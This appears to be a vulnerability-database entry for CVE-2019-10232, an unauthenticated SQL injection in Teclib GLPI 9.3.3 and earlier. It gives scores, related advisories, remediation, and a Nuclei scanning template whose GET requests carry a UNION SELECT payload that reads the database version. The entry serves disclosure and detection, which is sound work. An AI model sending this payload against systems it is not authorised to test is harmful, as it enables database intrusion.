Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection

🗓️ 18 Jun 2026 12:11:27Reported by ProjectDiscoveryType

Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection exposes /scripts/unlock_tasks.php allowing arbitrary SQL queries. Upgrade to 9.3.4 or later to mitigate. Severity: Critica

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2019-10232	24 Dec 202305:46	–	circl
CNVD	Teclib GLPI SQL Injection Vulnerability	28 Mar 201900:00	–	cnvd
CVE	CVE-2019-10232	27 Mar 201916:23	–	cve
Cvelist	CVE-2019-10232	27 Mar 201916:23	–	cvelist
NVD	CVE-2019-10232	27 Mar 201917:29	–	nvd
OSV	UBUNTU-CVE-2019-10232	27 Mar 201917:29	–	osv
Prion	Sql injection	27 Mar 201917:29	–	prion
RedhatCVE	CVE-2019-10232	22 May 202508:07	–	redhatcve
UbuntuCve	CVE-2019-10232	27 Mar 201917:29	–	ubuntucve
Tenable Nessus	Linux Distros Unpatched Vulnerability : CVE-2019-10232	10 Sep 202500:00	–	nessus

Source	Link
synacktiv	www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
github	www.github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
nvd	www.nvd.nist.gov/vuln/detail/CVE-2019-10232
github	www.github.com/ARPSyndicate/kenzer-templates
github	www.github.com/HimmelAward/Goby_POC

id: CVE-2019-10232

info:
  name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
  author: RedTeamBrasil
  severity: critical
  description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability.
  reference:
    - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
    - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10232
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10232
    cwe-id: CWE-89
    epss-score: 0.23211
    epss-percentile: 0.97484
    cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: teclib-edition
    product: gestionnaire_libre_de_parc_informatique
  tags: cve,cve2019,glpi,sqli,injection,teclib-edition,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
      - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "-MariaDB-"
          - "Start unlock script"
        condition: and

    extractors:
      - type: regex
        regex:
          - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
        part: body
# digest: 4a0a0047304502202e4d3816b2045808382592b6f619c67d3c6380656b1e726b415edc51440094b9022100c08106ae252b8cdec7df45b78c5be46fc7176495e8b072d972999ddd2d88445b:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

8.6High risk

Vulners AI Score8.6

CVSS 27.5

CVSS 39.8

EPSS0.23211